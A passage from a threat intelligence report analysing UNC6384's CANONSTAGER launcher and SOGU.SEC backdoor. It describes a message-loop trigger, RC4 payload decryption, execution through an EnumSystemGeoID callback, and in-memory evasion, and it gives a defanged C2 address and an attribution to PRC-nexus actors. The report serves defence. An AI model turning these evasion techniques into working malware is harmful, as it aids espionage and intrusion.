In order to trigger the malicious window procedure, CANONSTAGER uses the ShowWindow function to send a WM_SHOWWINDOW (0x0018) message to its newly created window via the Message Queue. Since the system, or other applications, may also post messages to the CANONSTAGER’s window, a standard Windows message loop is entered. This allows all posted messages to be sent, including the intended WM_SHOWWINDOW message.
GetMessageW – retrieve all messages in the thread’s message queue.
TranslateMessage – Convert message from a “virtual-key” to a “character message”.
DispatchMessage – Delivers the message to the specific function (WindowProc) that handles messages for the window targeted by that message.
Loop back to 1, until all messages are dispatched.
Deploying SOGU.SEC
After the correct message type is received by the window procedure, CANONSTAGER moves on to deploying its SOGU.SEC payload with the following steps:
Read the encrypted “cnmplog.dat” file, packaged in the downloaded MSI;
Decrypt the file with a hardcoded 16-byte RC4 key;
Execute the decrypted payload using an EnumSystemGeoID callback function.
Figure 11: Callback function executing SOGU.SEC
UNC6384 has previously used both payload encryption and callback functions to deploy SOGU.SEC. These techniques are used to hide malicious code, evade detection, obfuscate control flow, and blend in with normal system activity. Additionally, all of these steps are done in-memory, avoiding endpoint file-based detections.
The Backdoor: SOGU.SEC
SOGU.SEC is a distinct variant of SOGU and is commonly deployed by UNC6384 in cyber espionage activity. This is a sophisticated, and heavily obfuscated, malware backdoor with a wide range of capabilities. It can collect system information, upload and download files from a C2, and execute a remote command shell. In this campaign, SOGU.SEC was observed communicating directly with the C2 IP address “166.88.2[.]90” using HTTPS.
Attribution
GTIG attributes this campaign to UNC6384, a PRC-nexus cyber espionage group believed to be associated with the threat actor TEMP.Hex (also known as Mustang Panda). Our attribution is based on similarities in tooling, TTPs, targeting, and overlaps in C2 infrastructure. UNC6384 and TEMP.Hex are both observed to target government sectors, primarily in Southeast Asia, in alignment with PRC strategic interests. Both groups have also been observed to deliver SOGU.SEC malware from DLL side-loaded malware launchers and have used the same C2 infrastructure.
Conclusion
This campaign is a clear example of the continued evolution of UNC6384's operational capabilities and highlights the sophistication of PRC-nexus threat actors. The use of advanced techniques such as AitM, combined with valid code signing and layered social engineering, demonstrates this threat actor's capabilities. This activity follows a broader trend GTIG has observed of PRC-nexus threat actors increasingly employing stealthy tactics to avoid detection.
GTIG actively monitors ongoing threats from actors like UNC6384 to protect users and customers. As part of this effort, Google continuously updates its protections and has taken specific action against this campaign.
Acknowledgment
A special thanks to Jon Daniels for their contributions.
Appendix: Indicators of Compromise
A Google Threat Intelligence (GTI) collection of related IOCs is available to registered users.